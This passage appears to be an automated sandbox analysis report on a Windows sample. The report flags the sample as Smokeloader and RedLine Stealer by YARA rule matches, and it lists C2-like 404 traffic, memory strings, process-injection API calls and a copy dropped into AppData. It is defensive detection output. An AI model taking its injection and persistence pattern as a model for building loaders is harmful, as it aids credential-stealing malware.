      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:53:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:53:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:53:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:54:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:54:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:54:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:54:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:54:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:54:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:54:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:55:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:55:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:55:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:55:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:55:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:55:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:55:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:55:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:55:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:56:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
      Source: explorer.exe, 00000001.00000000.1763031463.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1760930928.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 00000001.00000000.1763031463.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1760930928.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 00000001.00000000.1763031463.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1760930928.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: explorer.exe, 00000001.00000000.1763031463.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1760930928.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: explorer.exe, 00000001.00000000.1763031463.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
      Source: explorer.exe, 00000001.00000000.1763031463.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
      Source: explorer.exe, 00000001.00000000.1762412862.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1764601072.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1761761015.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 00000001.00000000.1767121349.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
      Source: explorer.exe, 00000001.00000000.1760930928.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
      Source: explorer.exe, 00000001.00000000.1760930928.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
      Source: explorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000001.00000000.1763031463.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000001.00000000.1763031463.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
      Source: explorer.exe, 00000001.00000000.1759947795.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1759297715.0000000001248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000001.00000000.1763031463.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763031463.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 00000001.00000000.1763031463.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
      Source: explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
      Source: explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
      Source: explorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
      Source: explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
      Source: explorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
      Source: explorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1767121349.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
      Source: explorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
      Source: explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
      Source: explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2043123976.0000000002D11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2043076647.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1777327835.00000000046C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 00000000.00000002.1776886814.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1777031529.0000000002DCD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.1776861891.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000005.00000002.2043123976.0000000002D11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2042926455.0000000002B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000005.00000002.2043076647.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000000.00000002.1777327835.00000000046C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
      Source: 00000005.00000002.2043219102.0000000002D9D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,0_2_00403277
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
      Source: C:\Users\user\Desktop\1HGXcC63iu.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401514
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,5_2_00402F97
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401542
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,5_2_00403247
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401549
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,5_2_0040324F
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,5_2_00403256
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401557
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,5_2_0040326C
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,5_2_00403277
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014FE
      Source: C:\Users\user\AppData\Roaming\scjabhtCode function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,5_2_00403290
      Source: 1HGXcC63iu.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
